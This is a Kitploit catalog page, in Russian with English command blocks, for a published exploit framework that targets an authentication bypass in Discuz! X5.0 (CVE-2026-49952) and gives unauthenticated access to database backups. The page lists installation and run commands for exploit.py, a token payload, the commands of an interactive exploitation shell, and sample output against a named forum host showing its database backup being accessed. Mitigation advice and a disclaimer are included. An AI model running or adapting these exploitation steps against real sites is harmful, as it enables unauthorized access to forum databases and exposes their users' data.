Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) — критическая уязвимость, позволяющая неавторизованный доступ к резервным копиям базы данных через повторное использование токена оракула шифрования UC_KEY. CVSS 9.1. Полнофункциональный инструмент с определением версии, многоэтапными атаками, интерактивной оболочкой и автоматизированной эксплуатацией. Только авторизованное тестирование. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
Аутентификация и авторизацияФреймворки для эксплойтовАнализ уязвимостейЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеБезопасность Баз Данных
GitHub

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

Репозиторий
126 дней назадЕщё не проверено

Описание

Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) — критическая уязвимость, позволяющая неавторизованный доступ к резервным копиям базы данных через повторное использование токена оракула шифрования UC_KEY. CVSS 9.1. Полнофункциональный инструмент с определением версии, многоэтапными атаками, интерактивной оболочкой и автоматизированной эксплуатацией. Только авторизованное тестирование.

Поделиться

Фреймворк эксплуатации обхода аутентификации Discuz! X5.0

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (Критический ) | Версия 1.0.0

Профессиональный инструмент для тестирования на проникновение, предназначенный для выявления и демонстрации критической уязвимости обхода аутентификации в Discuz! X5.0.

D1

📋 Содержание

  • ⚠️ Отказ от ответственности

  • 🔍 Обзор

  • 🎯 Детали уязвимости

  • ✨ Возможности

  • 📦 Установка

  • 🚀 Быстрый старт

  • 💻 Примеры использования

  • 🖥️ Интерактивная оболочка

  • 🛡️ Вопросы безопасности

  • 🔧 Устранение неполадок

  • 📄 Лицензия


⚠️ Отказ от ответственности

ВАЖНОЕ УВЕДОМЛЕНИЕЭтот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.НЕ ИСПОЛЬЗУЙТЕ этот инструмент на системах, которыми вы не владеете или для тестирования которых у вас нет явного разрешения.Несанкционированный доступ к компьютерным системам незаконен и неэтичен.Автор не несёт ответственности за любое неправильное использование или ущерб, причинённый данным инструментом.Используя этот инструмент, вы соглашаетесь соблюдать все применимые законы и нормативные акты.


🔍 Обзор

Фреймворк эксплуатации обхода аутентификации Discuz! X5.0 предназначен для выявления и демонстрации критической уязвимости обхода аутентификации (CVE-2026-49952) в версиях Discuz! X5.0, выпущенных в период с 20 марта 2026 года по 1 мая 2026 года.

Эта уязвимость позволяет неаутентифицированным злоумышленникам получить доступ к функции резервного копирования базы данных (dbbak.php) путём эксплуатации оракула шифрования UC_KEY для повторного использования токена, что потенциально может привести к раскрытию конфиденциального содержимого базы данных.

Ключевые моменты

  • 🏆 Оценка CVSS: 9.1 (Критический)

  • 🔐 Воздействие: Обход аутентификации

  • 📂 Доступ: Файлы резервных копий базы данных

  • ⚡ Сложность: Низкая (легко эксплуатируется)

  • 🎯 Цель: Discuz! X5.0 (20260320 - 20260501)


🎯 Детали уязвимости

Техническое описание

Первопричина

Уязвимость присутствует в конечной точке dbbak.php, где механизм проверки токена полагается на оракул шифрования UC_KEY. Создав специальную полезную нагрузку в запросе входа в систему (member.php), злоумышленник может получить действительный токен аутентификации, который можно повторно использовать для доступа к функции резервного копирования базы данных без надлежащей авторизации.

Затронутые версии

  • ❌ Discuz! X5.0 (20260320 - 20260501) - уязвима

  • ✅ Discuz! X5.0 (20260510+) - исправлена


✨ Возможности

Основные возможности

  • 🔍 Определение версии: автоматическое распознавание отпечатков и идентификация версии Discuz!.

  • ⚡ Многовариантная атака: параллельное тестирование нескольких вариантов полезной нагрузки.

  • 🖥️ Интерактивная оболочка: полнофункциональный интерфейс командной строки для ручной эксплуатации.

  • 🚀 Автоматическая эксплуатация: эксплуатация в один клик с минимальной настройкой.

  • 📊 Сохранение результатов: экспорт результатов эксплуатации в файлы с временными метками.

  • 🌐 Поддержка прокси: настройка HTTP/HTTPS прокси для сетевого доступа.

  • 🎯 Многопоточное сканирование: настраиваемое количество потоков для оптимизации производительности.

  • 🎨 Цветной вывод: профессиональный цветной вывод в терминале.

Дополнительные возможности

  • 🔐 Поддержка SSL/TLS: работа с целями как по HTTP, так и по HTTPS.

  • 🔄 Управление сеансами: поддержание постоянного состояния сеанса.

  • 📦 Настройка полезной нагрузки: поддержка внедрения пользовательской полезной нагрузки.

  • 🎯 Проверка цели: проверка установки Discuz! перед эксплуатацией.


📦 Установка

Предварительные требования

  • Python: версия 3.7 или выше

  • Pip: менеджер пакетов Python

Установка из исходного кода

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

Установка через Docker

root@kitploit:~
# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 Быстрый старт

Базовое использование

root@kitploit:~
# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

Расширенное использование

root@kitploit:~
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 Примеры использования

Пример 1: Базовая эксплуатация

root@kitploit:~
python3 exploit.py http://discuz.eda.com.my
📤 Ожидаемый вывод
root@kitploit:~
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝

🖥️ Интерактивная оболочка

Запустите интерактивную оболочку для ручной эксплуатации:

root@kitploit:~
python3 discuz_exploit.py http://target.com --interactive

Доступные команды


🛡️ Вопросы безопасности

✅ Что следует делать

  • Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.

  • Получите письменное разрешение перед тестированием.

  • Следуйте практике ответственного раскрытия уязвимостей.

  • Сообщайте об уязвимостях производителям надлежащим образом.

  • Используйте в изолированных лабораторных средах для обучения.

❌ Чего не следует делать

  • Никогда не используйте против производственных систем без разрешения.

  • Не публикуйте полученные данные в открытом доступе.

  • Никогда не используйте для незаконной деятельности или кражи данных.

  • Не изменяйте и не удаляйте данные во время тестирования.

  • Никогда не проводите эксплуатацию без согласия.

Рекомендации по снижению риска

Для системных администраторов:

  1. Немедленно обновитесь: обновитесь до Discuz! X5.0 (20260510+) или более поздней версии.

  2. Отключите конечную точку: временно отключите dbbak.php, если в ней нет необходимости.

  3. Следите за журналами: отслеживайте подозрительные обращения к member.php и dbbak.php.

  4. Правила WAF: внедрите правила Web Application Firewall для блокировки вредоносных запросов.

  5. Белый список IP: ограничьте доступ к конечной точке резервного копирования доверенными IP-адресами.


🔧 Устранение неполадок

❌ Ошибки подключения
root@kitploit:~
Error: Failed to connect to target

Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
🚫 Ошибка аутентификации
root@kitploit:~
Error: Authentication failed or invalid authcode

Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details

📄 Лицензия

Этот проект лицензирован в соответствии с лицензией MIT.

Copyright © 2026 Sudeepa Wanigarathna

Настоящим предоставляется бесплатное разрешение любому лицу, получившему копию данного программного обеспечения и связанных файлов документации (далее — «Программное обеспечение»), использовать Программное обеспечение без ограничений, включая, без ограничений, права использовать, копировать, изменять, объединять, публиковать, распространять, сублицензировать и/или продавать копии Программного обеспечения, а также разрешать лицам, которым предоставлено Программное обеспечение, делать это при соблюдении следующих условий:

Вышеуказанное уведомление об авторских правах и данное разрешение должны быть включены во все копии или значительные части Программного обеспечения.

ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ «КАК ЕСТЬ», БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ, ЯВНЫХ ИЛИ ПОДРАЗУМЕВАЕМЫХ, ВКЛЮЧАЯ, НО НЕ ОГРАНИЧИВАЯСЬ, ГАРАНТИЯМИ ТОВАРНОЙ ПРИГОДНОСТИ, СООТВЕТСТВИЯ КОНКРЕТНОМУ НАЗНАЧЕНИЮ И ОТСУТСТВИЯ НАРУШЕНИЯ ПРАВ. НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ АВТОРЫ ИЛИ ПРАВООБЛАДАТЕЛИ НЕ НЕСУТ ОТВЕТСТВЕННОСТИ ПО КАКИМ-ЛИБО ИСКАМ, УБЫТКАМ ИЛИ ИНОЙ ОТВЕТСТВЕННОСТИ, БУДЬ ТО В СИЛУ ДОГОВОРА, ДЕЛИКТА ИЛИ ИНЫМ ОБРАЗОМ, ВОЗНИКШИМ ИЗ ИЛИ В СВЯЗИ С ПРОГРАММНЫМ ОБЕСПЕЧЕНИЕМ ИЛИ ЕГО ИСПОЛЬЗОВАНИЕМ ИЛИ ИНЫМИ ДЕЙСТВИЯМИ С НИМ.


Автор: Sudeepa Wanigarathna | GitHub: @CerberusMrXi

⭐ Если вы считаете этот инструмент полезным, пожалуйста, поставьте ему звезду!

🔐 Используйте ответственно. Будьте этичны. Продолжайте учиться.

Скачать инструмент
АтрибутДетали
Тип уязвимостиОбход аутентификации
Идентификатор CVECVE-2026-49952
Версия CVSS3.1
Оценка CVSS9.1 (Критический)
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииОтсутствуют
Взаимодействие с пользователемНе требуется
Влияние на конфиденциальностьВысокое
Влияние на целостностьВысокое
Влияние на доступностьВысокое
Зрелость кода эксплойтаФункциональная
Уровень устраненияДоступно официальное исправление
КомандаОписаниеПример
helpПоказать все доступные командыhelp
scanОпределить версию Discuz! и проверить уязвимостьscan
get [payload]Извлечь authcode (опциональная пользовательская нагрузка )`get admin
exploit [op]Выполнить эксплойт (по умолчанию: backup)exploit backup
saveСохранить результаты в файлsave
infoПоказать информацию о сеансеinfo
clearОчистить экран терминалаclear
exit / quitВыйти из интерактивной оболочкиexit